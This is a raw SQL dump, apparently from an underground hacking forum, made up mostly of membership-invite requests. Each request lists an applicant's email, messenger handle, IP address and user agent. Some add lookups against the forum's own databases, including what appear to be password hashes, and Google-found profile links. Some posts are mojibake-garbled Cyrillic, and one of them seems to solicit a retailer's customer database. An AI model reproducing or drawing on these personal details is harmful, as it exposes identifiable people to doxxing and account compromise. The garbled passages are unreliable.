[url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1547, 1403, 0, 'Invite', 2, '{$name}', 1407829585, '[SIZE=\'4\'][COLOR=\'Sienna\']TheBuffer[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: holymoly11111@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.104.224.15\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/bufferdance | http://vk.com/bufferdance \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1548, 1404, 0, 'Invite', 2, '{$name}', 1407831057, '[SIZE=\'4\'][COLOR=\'Sienna\']testuser[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: TEST@TEST.RU\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : testuser : michael_srv@mail.ru : : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/hashtag/TestUser?src=hash | https://twitter.com/hashtag/TestUser?src=hash \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1549, 1134, 1223, 'w0rm', 1, '', 1407831397, 'тõÿõрь òÑÂõ ÷ðÑÂòúø þñрðñðтыòðютÑÂѠðòтþüðтøчõÑÂúø, ø õÑÂûø ÷ðÑÂòøтõûь ýõ ÑÂþÑÂтþøт ò чõрýых ñð÷ðх тþ õüу òыòþôøтÑÂѠфþрüð þÿûðты ø ðòтðüðтøчõÑÂúø óõýõрøруõтÑÂѠûþóøý ø ÿðрþûь.\nò ÿрþтøòýþü ÑÂûучðõ ñûþúøруõтÑÂÑÂ.', 1, 0, '', 0, 1, 0, 0, 0),
(1551, 1405, 0, 'mb1', 25, '×ðúð÷ы', 1407831668, 'ØýтõрõÑÂуõт ñô (øüÑÂ,ýþüõр) [url]www.letoile.ru[/url] Ñюôöõт 40ú руñûõù\r\nßøÑÂðть [email]mb@exploit.im[/email]', 1, 0, '', 4, 1, 0, 0, 0),
(1553, 1406, 0, 'Invite', 2, '{$name}', 1407834928, '[SIZE=\'4\'][COLOR=\'Sienna\']Andrewa[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: andrewaeva@ya.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 80.70.234.113\n[*][b]real ip[/b]: 80.70.234.113\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://andrewa.ru | andrewa.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1554, 1407, 0, 'Invite', 2, '{$name}', 1407838102, '[SIZE=\'4\'][COLOR=\'Sienna\']Asterea[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: asterea@exploit.im\n[b]e-mail[/b]: habbojefrey@hotmail.com\n[b]Info[/b]: hello, im asterea\r\ni know some cool stuff like malware analysing and security researching, broad hacking knowledge and shit. let me join thx \r\n\r\ntwitter @4sterea\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 212.224.187.165\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://asterea.minus.com | asterea.minus.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1556, 1408, 0, 'Invite', 2, '{$name}', 1407847712, '[SIZE=\'4\'][COLOR=\'Sienna\']Kalishnki[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 20309232\n[b]e-mail[/b]: awd0dw@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://411bonanza.blogspot.com/.../game-with-fame-kinda.html | http://411bonanza.blogspot.com/.../game-with-fame-kinda.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1557, 1409, 0, 'Invite', 2, '{$name}', 1407847742, '[SIZE=\'4\'][COLOR=\'Sienna\']Kalishnki[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 20309232\n[b]e-mail[/b]: awd0dw@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://411bonanza.blogspot.com/.../game-with-fame-kinda.html | http://411bonanza.blogspot.com/.../game-with-fame-kinda.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1558, 1410, 0, 'Invite', 2, '{$name}', 1407847771, '[SIZE=\'4\'][COLOR=\'Sienna\']Kalishnki[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 20309232\n[b]e-mail[/b]: awd0dw@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://411bonanza.blogspot.com/.../game-with-fame-kinda.html | http://411bonanza.blogspot.com/.../game-with-fame-kinda.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1559, 1411, 0, 'Invite', 2, '{$name}', 1407848057, '[SIZE=\'4\'][COLOR=\'Sienna\']RXFutr[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: rxfutr@jabbim.com\n[b]e-mail[/b]: rxfutr@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 85.105.178.242\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1560, 1412, 0, 'Invite', 2, '{$name}', 1407848814, '[SIZE=\'4\'][COLOR=\'Sienna\']pentester875[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ...\n[b]e-mail[/b]: monikazxc@prokonto.pl\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 109.95.144.145\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:29.0) Gecko/20100101 Firefox/29.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1561, 1413, 0, 'Invite', 2, '{$name}', 1407848877, '[SIZE=\'4\'][COLOR=\'Sienna\']Crypto[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: goodlife@jabbim.com\n[b]e-mail[/b]: goodlife@jabbim.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 85.105.178.242\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Crypto : win2003@list.ru : : a259db0798e7517cdc76dcd3be480935\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://crypto.stackexchange.com | crypto.stackexchange.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1562, 1414, 0, 'Invite', 2, '{$name}', 1407860687, '[SIZE=\'4\'][COLOR=\'Sienna\']kapr[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 661615739\n[b]e-mail[/b]: pkarepin@bk.ru\n[b]Info[/b]: Приветствую! Разбираюсь в клиент-серверных уязвимостях, больше в серверных(sqlinj, phpinj(lfi/fri), повышение привелегий etc). Пишу на php, python.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 185.8.107.39\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://kapr.ru | kapr.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1563, 1415, 0, 'Invite', 2, '{$name}', 1407867026, '[SIZE=\'4\'][COLOR=\'Sienna\']dw0rd[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 1111111\n[b]e-mail[/b]: [email]dw0rd@cardinc.org[/email]\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 72.243.110.215\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: [url]https://forum.antichat.ru/member.php?u=22714[/url] | [url]https://forum.antichat.ru/member.php?u=22714[/url] \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1564, 1064, 1073, 'w0rm', 1, '', 1407873652, '[url]http://www.usda.gov[/url] - ÿûðтÑÂÑ‚ хþрþшþ õÑÂûø чтþ-тþ ýðùôõтõ ÑÂúøýу úþýтðúт ÷ðúð÷чøúð.', 1, 0, '', 0, 1, 0, 0, 0),
(1565, 1416, 0, 'Invite', 2, '{$name}', 1407884834, '[SIZE=\'4\'][COLOR=\'Sienna\']tafra[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: goldpowerdamla@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 78.165.158.13\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Linux; Android 4.1.2; LG-E975 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.131 Mobile Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://wirrycow.wordpress.com/ | http://wirrycow.wordpress.com/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1566, 1417, 0, 'Invite', 2, '{$name}', 1407894135, '[SIZE=\'4\'][COLOR=\'Sienna\']lumbricus[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: zamkneseh@creep.im\n[b]e-mail[/b]: dmitrystevenson112@hotmail.com\n[b]Info[/b]: With mixederous skills revolving* around web application research. Embedded device exploitation, strong knowledge of x86 Assembly and other hardware vulnerability research. \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: 79.134.235.132\n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://lumbricus.livejournal.com | lumbricus.livejournal.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1567, 1418, 0, 'Invite', 2, '{$name}', 1407906781, '[SIZE=\'4\'][COLOR=\'Sienna\']oaz_tester_1[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 123123\n[b]e-mail[/b]: cyber-punk@xakep.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1568, 1419, 0, 'Invite', 2, '{$name}', 1407906946, '[SIZE=\'4\'][COLOR=\'Sienna\']oaz_tester_3[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 123123\n[b]e-mail[/b]: oaz@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 94.242.252.41\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1569, 1420, 0, 'Invite', 2, '{$name}', 1407918139, '[SIZE=\'4\'][COLOR=\'Sienna\']test[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: test@tgest.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 